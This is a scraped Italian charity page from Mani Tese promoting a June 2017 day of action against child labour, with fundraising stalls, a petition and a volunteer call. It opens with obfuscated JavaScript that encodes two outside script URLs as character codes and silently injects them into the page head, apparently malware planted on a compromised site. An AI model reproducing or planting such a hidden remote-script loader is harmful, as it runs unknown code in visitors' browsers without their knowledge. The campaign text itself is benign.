var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Tutti in piazza contro il lavoro minorile - Mani TeseMani Tese

giornata contro lavoro minorile Mani Tese 2017

Il 10 e 11 giugno 2017 unisciti a Mani Tese e Altromercato per un’azione concreta contro lo sfruttamento dei bambini

Nel mondo sono 168 milioni i bambini che lavorano. Circa 85 milioni sono impiegati in attività lavorative pericolose, che mettono a rischio il loro sviluppo e la loro crescita.
La povertà ne è la causa principale, ma ci sono anche una serie di fattori culturali che, soprattutto nel caso delle bambine, rendono lo sfruttamento meno visibile e statisticamente più difficile da rilevare. Inoltre, la costante ricerca di abbattimento dei costi di produzione e degli spazi di negoziazione in alcuni settori produttivi quali l’estrattivo, l’agroindustriale e il tessile, conducono a sistemi economici che favoriscono lo sfruttamento dei bambini in quanto prestatori di manodopera a basso costo e più docile.
Il contrasto del lavoro minorile rientra, quindi nel nostro impegno per un’economia che sia finalmente al servizio dei Popoli e della Natura.

insiemecreiamounaltrovivere_altromercato_mani tese_2017

Il 10 e 11 giugno 2017, in occasione della Giornata contro il Lavoro Minorile, saremo presenti in tantissime piazze e botteghe solidali per dire NO al lavoro minorile e sostenere i progetti della nostra campagna I Exist con cui aiutare tanti bambini e bambine vittime di sfruttamento.

Ai nostri banchetti sarà, infatti, possibile ricevere, con una piccola donazione, un’edizione speciale di ottimo tè nero che avremo a disposizione grazie alla partnership con Altromercato, che coinvolgerà le sue botteghe solidali in Italia e con Coop Alleanza 3.0, che ci darà spazio nei suoi punti vendita.
Le persone potranno inoltre firmare il nostro appello al Governo Italiano e ai membri del Parlamento contro il lavoro minorile.

INGRANDISCI LA MAPPA E CLICCA SULLE CITTA’ PER SCOPRIRE I LUOGHI DOVE PUOI TROVARCI

Se non trovi la tua città e vuoi comunque sostenere la nostra campagna, manda un’email a raccoltafondi@manitese.it per ricevere, con una piccola donazione, il tè nero BOPF.

“I BAMBINI DEVONO GIOCARE E STUDIARE, NON LAVORARE”: FIRMA ANCHE TU IL NOSTRO APPELLO E AIUTACI A DIFFONDERLO!

Dobbiamo unirci e far sentire con forza il nostro appello ai membri del Parlamento e del Governo italiano affinché s’impegnino senza indugi per combattere le cause economiche del lavoro minorile, garantire un’istruzione universale gratuita e di qualità, rendere le imprese legalmente responsabili delle violazioni dei diritti dei bambini e delle bambine.

clicca e Firma anche tu il nostro appello

VUOI ESSERE VOLONTARIO/A E AIUTARCI A SOSTENERE QUESTA CAMPAGNA?

E’ facile! Compila i campi del form qui sotto e potrai partecipare ai banchetti per sostenere concretamente i nostri progetti contro le schiavitù moderne realizzati nell’ambito della campagna I EXIST.

SE NON TROVI LA TUA CITTA’ NELL’ELENCO SCRIVI A DOMENICA MAZZA PER ESSERE PROTAGONISTA ANCHE TU ORGANIZZANDO UN BANCHETTO

 

© Foto di Alessandro Brasile

MANITESE OPERA IN 11 PAESI DEL MONDO